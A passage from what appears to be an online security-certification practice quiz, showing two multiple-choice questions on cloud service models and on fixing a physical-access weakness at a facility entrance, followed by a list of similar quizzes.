When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited?
Answer
  • Infrastructure
  • Platform
  • Software
  • Virtualization

Question 200

Question
An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?
Answer
  • Faraday cage
  • Air gap
  • Mantrap
  • Bollards
Show full summary Hide full summary

Similar

CCNA Security Final Exam
Maikel Degrande
Security Guard Training
Summit College
ISACA CISM Exam Glossary
Fred Jones
Security
annelieserainey
Securities Regulation
harpratap_singh
2W151 Volume 1: Safety and Security - Quiz 7
Joseph Whilden J
Security Quiz Review
Rylan Blah
Security Policies
indysingh7285
2W151 Volume 1: Safety and Security - Quiz 6
Joseph Whilden J
Security (2)
Daniel Freedman
Certified Security Compliance Specialist
jnkdmls